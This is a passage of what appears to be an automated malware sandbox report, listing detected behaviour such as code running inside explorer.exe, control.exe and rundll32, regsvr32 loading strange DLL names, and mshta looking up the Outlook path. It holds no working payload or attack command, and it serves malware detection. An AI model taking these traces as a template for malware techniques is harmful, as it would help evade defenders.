Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553210A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,	35_2_000001ED553210A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553123A4 NtQueryInformationProcess,	35_2_000001ED553123A4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5533A003 NtProtectVirtualMemory,NtProtectVirtualMemory,	35_2_000001ED5533A003

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAB0DC	1_2_04FAB0DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA5920	1_2_04FA5920
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEC0C0	30_2_04DEC0C0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEF8AC	30_2_04DEF8AC
Source: C:\Windows\explorer.exe	Code function: 30_2_04E09494	30_2_04E09494
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFA054	30_2_04DFA054
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0C34	30_2_04DF0C34
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00180	30_2_04E00180
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEBD6C	30_2_04DEBD6C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEE2F0	30_2_04DEE2F0
Source: C:\Windows\explorer.exe	Code function: 30_2_04E06A5C	30_2_04E06A5C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEF204	30_2_04DEF204
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE48E8	30_2_04DE48E8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE60E4	30_2_04DE60E4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFDCE4	30_2_04DFDCE4
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00C88	30_2_04E00C88
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF5030	30_2_04DF5030
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF19D4	30_2_04DF19D4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEC9D0	30_2_04DEC9D0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE95A8	30_2_04DE95A8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF8D74	30_2_04DF8D74
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE1EFC	30_2_04DE1EFC
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEDEF0	30_2_04DEDEF0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE4E94	30_2_04DE4E94
Source: C:\Windows\explorer.exe	Code function: 30_2_04E04290	30_2_04E04290
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEAA50	30_2_04DEAA50
Source: C:\Windows\explorer.exe	Code function: 30_2_04DECE44	30_2_04DECE44
Source: C:\Windows\explorer.exe	Code function: 30_2_04E07A5C	30_2_04E07A5C
Source: C:\Windows\explorer.exe	Code function: 30_2_04E0062C	30_2_04E0062C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFB210	30_2_04DFB210
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF6A34	30_2_04DF6A34
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE7FCC	30_2_04DE7FCC
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFD3A0	30_2_04DFD3A0
Source: C:\Windows\explorer.exe	Code function: 30_2_04E08320	30_2_04E08320
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE2F0C	30_2_04DE2F0C
Source: C:\Windows\explorer.exe	Code function: 30_2_04E08B18	30_2_04E08B18
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EF8AC	31_2_008EF8AC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EE2F0	31_2_008EE2F0
Source: C:\Windows\System32\control.exe	Code function: 31_2_00906A5C	31_2_00906A5C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00909494	31_2_00909494
Source: C:\Windows\System32\control.exe	Code function: 31_2_00900C88	31_2_00900C88
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EC0C0	31_2_008EC0C0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E48E8	31_2_008E48E8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E60E4	31_2_008E60E4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FDCE4	31_2_008FDCE4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F0C34	31_2_008F0C34
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F5030	31_2_008F5030
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FA054	31_2_008FA054
Source: C:\Windows\System32\control.exe	Code function: 31_2_00900180	31_2_00900180
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E95A8	31_2_008E95A8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F19D4	31_2_008F19D4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EC9D0	31_2_008EC9D0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EBD6C	31_2_008EBD6C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F8D74	31_2_008F8D74
Source: C:\Windows\System32\control.exe	Code function: 31_2_00904290	31_2_00904290
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E4E94	31_2_008E4E94
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E1EFC	31_2_008E1EFC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EDEF0	31_2_008EDEF0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EF204	31_2_008EF204
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FB210	31_2_008FB210
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F6A34	31_2_008F6A34
Source: C:\Windows\System32\control.exe	Code function: 31_2_0090062C	31_2_0090062C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008ECE44	31_2_008ECE44
Source: C:\Windows\System32\control.exe	Code function: 31_2_00907A5C	31_2_00907A5C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EAA50	31_2_008EAA50
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FD3A0	31_2_008FD3A0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E7FCC	31_2_008E7FCC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E2F0C	31_2_008E2F0C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00908B18	31_2_00908B18
Source: C:\Windows\System32\control.exe	Code function: 31_2_00908320	31_2_00908320
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530F8AC	35_2_000001ED5530F8AC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530E2F0	35_2_000001ED5530E2F0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55320180	35_2_000001ED55320180
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55318D74	35_2_000001ED55318D74
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530BD6C	35_2_000001ED5530BD6C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553095A8	35_2_000001ED553095A8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530F204	35_2_000001ED5530F204
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530C9D0	35_2_000001ED5530C9D0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553119D4	35_2_000001ED553119D4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530CE44	35_2_000001ED5530CE44
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55316A34	35_2_000001ED55316A34
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5532062C	35_2_000001ED5532062C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531B210	35_2_000001ED5531B210
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55320C88	35_2_000001ED55320C88
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531A054	35_2_000001ED5531A054
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530C0C0	35_2_000001ED5530C0C0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55329494	35_2_000001ED55329494
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531DCE4	35_2_000001ED5531DCE4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553060E4	35_2_000001ED553060E4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553048E8	35_2_000001ED553048E8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55307FCC	35_2_000001ED55307FCC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531D3A0	35_2_000001ED5531D3A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55315030	35_2_000001ED55315030
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55310C34	35_2_000001ED55310C34
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530AA50	35_2_000001ED5530AA50
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55326A5C	35_2_000001ED55326A5C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55327A5C	35_2_000001ED55327A5C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55324290	35_2_000001ED55324290
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55304E94	35_2_000001ED55304E94
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55302F0C	35_2_000001ED55302F0C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530DEF0	35_2_000001ED5530DEF0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55301EFC	35_2_000001ED55301EFC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55328320	35_2_000001ED55328320
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55328B18	35_2_000001ED55328B18

One or more processes crash

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 948

PE file does not import any functions

Source: 40soah3l.dll.26.dr	Static PE information: No import functions for PE file found
Source: kpzypqek.dll.28.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
